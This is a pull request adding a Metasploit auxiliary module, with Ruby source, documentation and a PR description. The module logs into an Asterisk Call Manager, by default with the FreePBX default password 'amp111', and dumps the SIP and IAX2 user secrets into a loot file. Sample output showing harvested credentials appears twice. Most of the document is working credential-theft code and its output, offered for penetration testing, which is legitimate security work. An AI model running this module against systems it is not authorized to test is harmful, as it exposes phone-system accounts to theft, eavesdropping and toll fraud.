### PR TITLE
Add Asterisk Gather Credentials auxiliary module

### DIFF
--- a/documentation/modules/auxiliary/gather/asterisk_creds.md
+++ b/documentation/modules/auxiliary/gather/asterisk_creds.md
@@ -1,0 +1,62 @@
+## Description
+
+  This module retrieves SIP and IAX2 user extensions and credentials from Asterisk Call Manager service.
+
+  Valid manager credentials are required.
+
+
+## Vulnerable Application
+
+  [Asterisk](http://www.asterisk.org/get-started/features) offers both classical PBX functionality and advanced features, and interoperates with traditional standards-based telephony systems and Voice over IP systems.
+
+  This module has been tested successfully on:
+
+  * Asterisk Call Manager version 2.10.0 on Asterisk 13.16.0
+  * Asterisk Call Manager version 1.1 on Asterisk 1.6.2.11
+
+  The following software comes with Asterisk preinstalled and can be used for testing purposes:
+
+  * [FreePBX](https://www.freepbx.org/downloads/)
+  * [VulnVoIP](https://www.rebootuser.com/?p=1069)
+
+  Note that Asterisk will reject valid authentication credentials when connecting from a network that has not been permitted using the `permit` directive (or is specifically denied in the `deny` directive) in the Asterisk manager configuration file `/etc/asterisk/manager.conf`.
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use auxiliary/gather/asterisk_creds`
+  3. Do: `set rhost <RHOST>`
+  4. Do: `set rport <RPORT>` (default: `5038`)
+  5. Do: `set username <USERNAME>` (default: `admin`)
+  6. Do: `set password <PASSWORD>` (default: `amp111`)
+  7. Do: `run`
+  8. You should get credentials
+
+
+## Scenarios
+
+  ```
+  [*] 172.16.191.229:5038 - Found Asterisk Call Manager version 2.10.0
+  [+] 172.16.191.229:5038 - Authenticated successfully
+  [*] 172.16.191.229:5038 - Found 9 users
+
+  Asterisk User Credentials
+  =========================
+
+   Username  Secret                Type
+   --------  ------                ----
+   100                             sip
+   103       bbf5d449753391a       sip
+   104       273db6cd9ca402f53354  iax2
+   105       secret password       sip
+   106       "_" ;)                iax2
+   107       123456789             sip
+   108       ~!@#$%^&*()_+{}       sip
+   109       antidisestablishment  iax2
+   123       y2u.be/VOaZbaPzdsk    iax2
+
+  [+] 172.16.191.229:5038 - Credentials saved in: /root/.msf4/loot/20170723052316_default_172.16.191.229_asterisk.user.cr_798166.txt
+  [*] Auxiliary module execution completed
+  ```
+

--- a/modules/auxiliary/gather/asterisk_creds.rb
+++ b/modules/auxiliary/gather/asterisk_creds.rb
@@ -1,0 +1,212 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Asterisk Gather Credentials',
+      'Description' => %q{
+        This module retrieves SIP and IAX2 user extensions and credentials from
+        Asterisk Call Manager service. Valid manager credentials are required.
+      },
+      'Author'      => 'Brendan Coles <bcoles[at]gmail.com>',
+      'References'  =>
+        [
+          ['URL', 'http://www.asterisk.name/sip1.html'],
+          ['URL', 'http://www.asterisk.name/iax2.html'],
+          ['URL', 'https://www.voip-info.org/wiki/view/Asterisk+manager+API'],
+          ['URL', 'https://www.voip-info.org/wiki-Asterisk+CLI']
+        ],
+      'License'     => MSF_LICENSE))
+    register_options [
+      Opt::RPORT(5038),
+      OptString.new('USERNAME', [true, 'The username for Asterisk Call Manager', 'admin']),
+      OptString.new('PASSWORD', [true, 'The password for the specified username', 'amp111'])
+    ]
+  end
+
+  def run
+    vprint_status 'Connecting...'
+
+    connect
+    banner = sock.get_once
+
+    unless banner =~ %r{Asterisk Call Manager/([\d\.]+)}
+      fail_with Failure::BadConfig, 'Asterisk Call Manager does not appear to be running'
+    end
+
+    print_status "Found Asterisk Call Manager version #{$1}"
+
+    unless login
+      fail_with Failure::NoAccess, 'Authentication failed'
+    end
+
+    print_good 'Authenticated successfully'
+
+    @users = []
+    retrieve_users 'sip'
+    retrieve_users 'iax2'
+
+    if @users.empty?
+      print_error 'Did not find any users'
+      return
+    end
+
+    print_status "Found #{@users.length} users"
+
+    cred_table = Rex::Text::Table.new 'Header'  => 'Asterisk User Credentials',
+                                      'Indent'  => 1,
+                                      'Columns' => ['Username', 'Secret', 'Type']
+
+    @users.each do |user|
+      cred_table << [ user['username'],
+                      user['password'],
+                      user['type'] ]
+      report_cred user:     user['username'],
+                  password: user['password'],
+                  proof:    "#{user['type']} show users"
+    end
+
+    print_line
+    print_line cred_table.to_s
+
+    p = store_loot 'asterisk.user.creds',
+                   'text/csv',
+                   rhost,
+                   cred_table.to_csv,
+                   'Asterisk User Credentials'
+
+    print_good "Credentials saved in: #{p}"
+  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
+    print_error e.message
+  ensure
+    disconnect
+  end
+
+  private
+
+  def username
+    datastore['USERNAME']
+  end
+
+  def password
+    datastore['PASSWORD']
+  end
+
+  def report_cred(opts)
+    service_data = {
+      address:      rhost,
+      port:         rport,
+      service_name: 'asterisk_manager',
+      protocol:     'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type:     :service,
+      module_fullname: fullname,
+      username:        opts[:user],
+      private_data:    opts[:password],
+      private_type:    :password
+    }.merge service_data
+
+    login_data = {
+      last_attempted_at: DateTime.now,
+      core:              create_credential(credential_data),
+      status:            Metasploit::Model::Login::Status::UNTRIED,
+      proof:             opts[:proof]
+    }.merge service_data
+
+    create_credential_login login_data
+  end
+
+  def send_command(cmd = '')
+    sock.put cmd
+
+    res = ''
+    timeout = 15
+    Timeout.timeout(timeout) do
+      res << sock.get_once while res !~ /\r?\n\r?\n/
+    end
+
+    res
+  rescue Timeout::Error
+    print_error "Timeout (#{timeout} seconds)"
+  rescue => e
+    print_error e.message
+  end
+
+  def login
+    vprint_status "Authenticating as '#{username}'"
+
+    req = "action: login\r\n"
+    req << "username: #{username}\r\n"
+    req << "secret: #{password}\r\n"
+    req << "events: off\r\n"
+    req << "\r\n"
+    res = send_command req
+
+    return false unless res =~ /Response: Success/
+
+    report_cred user:     username,
+                password: password,
+                proof:    'Response: Success'
+
+    report_service :host  => rhost,
+                   :port  => rport,
+                   :proto => 'tcp',
+                   :name  => 'asterisk'
+    true
+  end
+
+  def retrieve_users(type)
+    vprint_status "Retrieving #{type.upcase} users..."
+
+    req = "action: command\r\n"
+    req << "command: #{type} show users\r\n"
+    req << "\r\n"
+    res = send_command req
+
+    if res =~ /Response: Error/ && res =~ /Message: Permission denied/
+      print_error 'Insufficient privileges'
+      return
+    end
+
+    unless res =~ /Response: Follows/
+      print_error 'Unexpected reply'
+      return
+    end
+
+    # The response is a whitespace formatted table
+    # We're only interested in the first two columns: username and secret
+    # To parse the table, we need the characer width of these two columns
+    if res =~ /^(Username\s+)(Secret\s+)/
+      user_len = $1.length
+      pass_len = $2.length
+    else
+      print_error "'#{type} show users' is not supported"
+      return
+    end
+
+    users = res.scan(/^Username\s+Secret.*?\r?\n(.*)--END COMMAND--/m).flatten.first
+
+    if users.blank?
+      print_error "Did not find any #{type.upcase} users"
+      return
+    else
+      print_status "Found #{type.upcase} users"
+    end
+
+    users.each_line do |line|
+      line.chomp!
+      user = line[0...user_len].sub(/\s+$/, '')
+      pass = line[user_len...(user_len + pass_len)].sub(/\s+$/, '')
+      @users << { 'username' => user, 'password' => pass, 'type' => type }
+    end
+  end
+end


### PR DESCRIPTION
This PR adds a post-auth credential dumping auxiliary module Asterisk Call Manager.

        This module retrieves SIP and IAX2 user extensions and credentials from
        Asterisk Call Manager service. Valid manager credentials are required.

Tested on:

* Asterisk Call Manager version 2.10.0 on Asterisk 13.16.0
* Asterisk Call Manager version 1.1 on Asterisk 1.6.2.11


## Verification

- [x] Start `msfconsole`
- [x] `use auxiliary/gather/asterisk_creds`
- [x] `set rhost <RHOST>`
- [x] `set username <USERNAME>` (default: `admin`)
- [x] `set password <PASSWORD>` (default: `amp111`)
- [x] `run`
- [x] **Verify** you get credentials

### Example Output

```
[*] 172.16.191.229:5038 - Found Asterisk Call Manager version 2.10.0
[+] 172.16.191.229:5038 - Authenticated successfully
[*] 172.16.191.229:5038 - Found 9 users

Asterisk User Credentials
=========================

 Username  Secret                Type
 --------  ------                ----
 100                             sip
 103       bbf5d449753391a       sip
 104       273db6cd9ca402f53354  iax2
 105       secret password       sip
 106       "_" ;)                iax2
 107       123456789             sip
 108       ~!@#$%^&*()_+{}       sip
 109       antidisestablishment  iax2
 123       y2u.be/VOaZbaPzdsk    iax2

[+] 172.16.191.229:5038 - Credentials saved in: /root/.msf4/loot/20170723052316_default_172.16.191.229_asterisk.user.cr_798166.txt
[*] Auxiliary module execution completed
```

## Installation

[FreePBX](https://www.freepbx.org/downloads/) comes with a modern version of Asterisk installed and the web interface provides a quick and easy way to configure Asterisk. 

FreePBX automatically configures the password for the `admin` user. The password can be found in the `secret=<PASSWORD>` directive in `/etc/asterisk/manager.conf`.

Note that Asterisk will reject valid authentication credentials if you're connecting from a forbidden network. Make sure you white list the network from which you'll be connecting. This can be achieved by specifying the `permit=0.0.0.0/255.255.255.0` directive in `/etc/asterisk/manager.conf` and ensuring the `deny` directive is not in use.

Alternatively [VulnVoIP](https://www.rebootuser.com/?p=1069) makes use of an ancient version of Asterisk and is configured with the default password `amp111` and no network access controls.

